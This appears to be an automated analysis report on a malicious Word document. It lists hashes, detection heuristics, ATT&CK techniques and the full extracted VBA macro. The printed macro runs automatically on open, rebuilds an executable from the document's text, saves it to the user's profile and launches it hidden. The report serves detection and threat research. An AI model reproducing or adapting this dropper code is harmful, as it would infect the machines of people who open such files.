Office (OLE) malware analysis — malicious · 27b100ab3073fc1b

MALICIOUS

Office (OLE)

3.99 MB Created: 2015-01-16 20:25:00 Authoring application: Microsoft Office Word First seen: 2015-02-05

MD5: 3b25dfdf3f89b0a1e161d442d1fd2227 SHA-1: 964cae96ec5364a84b13edaa305e4e3fb35fa208 SHA-256: 27b100ab3073fc1b0b7459862930687aed91aa3fb1770e07472ac8a041fdb87f

214 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Auto_Open macro is designed to execute a shell command. It appears to reconstruct a binary file named 'dnyoxbau.exe' from the document's body text, which is then executed from the user's profile directory. This behavior is consistent with a macro-based downloader.

Heuristics 9

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Bvplo7 = Shell(Bvplo10, vbHide)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    Bvplo2 = Environ("USERPROFILE")
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1710 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1710 bytes
SHA-256: `ca19337dbe7597b81e53ce6239475adcb5bee4483f9152d320e1d09a1201b90c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub Auto_Open() Bvplo12 End Sub Sub Bvplo12() Dim Bvplo7 As Integer Dim Bvplo1 As String Dim Bvplo2 As String Dim Bvplo3 As Integer Dim Bvplo4 As Paragraph Dim Bvplo8 As Integer Dim Bvplo9 As Boolean Dim Bvplo5 As Integer Dim Bvplo11 As String Dim Bvplo6 As Byte Dim Sdokloiafg As String Sdokloiafg = "Sdokloiafg" Bvplo1 = "dnyoxbau.exe" Bvplo2 = Environ("USERPROFILE") ChDrive (Bvplo2) ChDir (Bvplo2) Bvplo3 = FreeFile() Open Bvplo1 For Binary As Bvplo3 For Each Bvplo4 In ActiveDocument.Paragraphs DoEvents Bvplo11 = Bvplo4.Range.Text If (Bvplo9 = True) Then Bvplo8 = 1 While (Bvplo8 < Len(Bvplo11)) Bvplo6 = Mid(Bvplo11, Bvplo8, 4) Put #Bvplo3, , Bvplo6 Bvplo8 = Bvplo8 + 4 Wend ElseIf (InStr(1, Bvplo11, Sdokloiafg) > 0 And Len(Bvplo11) > 0) Then Bvplo9 = True End If Next Close #Bvplo3 Bvplo13 (Bvplo1) End Sub Sub Bvplo13(Bvplo10 As String) Dim Bvplo7 As Integer Dim Bvplo2 As String Bvplo2 = Environ("USERPROFILE") ChDrive (Bvplo2) ChDir (Bvplo2) Bvplo7 = Shell(Bvplo10, vbHide) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub

SHA-256: ca19337dbe7597b81e53ce6239475adcb5bee4483f9152d320e1d09a1201b90c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Auto_Open()
    Bvplo12
End Sub

Sub Bvplo12()
    Dim Bvplo7 As Integer
    Dim Bvplo1 As String
    Dim Bvplo2 As String
    Dim Bvplo3 As Integer
    Dim Bvplo4 As Paragraph
    Dim Bvplo8 As Integer
    Dim Bvplo9 As Boolean
    Dim Bvplo5 As Integer
    Dim Bvplo11 As String
    Dim Bvplo6 As Byte
    Dim Sdokloiafg As String
    Sdokloiafg = "Sdokloiafg"
    Bvplo1 = "dnyoxbau.exe"
    Bvplo2 = Environ("USERPROFILE")
    ChDrive (Bvplo2)
    ChDir (Bvplo2)
    Bvplo3 = FreeFile()
    Open Bvplo1 For Binary As Bvplo3
    For Each Bvplo4 In ActiveDocument.Paragraphs
        DoEvents
            Bvplo11 = Bvplo4.Range.Text
        If (Bvplo9 = True) Then
            Bvplo8 = 1
            While (Bvplo8 < Len(Bvplo11))
                Bvplo6 = Mid(Bvplo11, Bvplo8, 4)
                Put #Bvplo3, , Bvplo6
                Bvplo8 = Bvplo8 + 4
            Wend
        ElseIf (InStr(1, Bvplo11, Sdokloiafg) > 0 And Len(Bvplo11) > 0) Then
            Bvplo9 = True
        End If
    Next
    Close #Bvplo3
    Bvplo13 (Bvplo1)
End Sub

Sub Bvplo13(Bvplo10 As String)
    Dim Bvplo7 As Integer
    Dim Bvplo2 As String
    Bvplo2 = Environ("USERPROFILE")
    ChDrive (Bvplo2)
    ChDir (Bvplo2)
    Bvplo7 = Shell(Bvplo10, vbHide)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.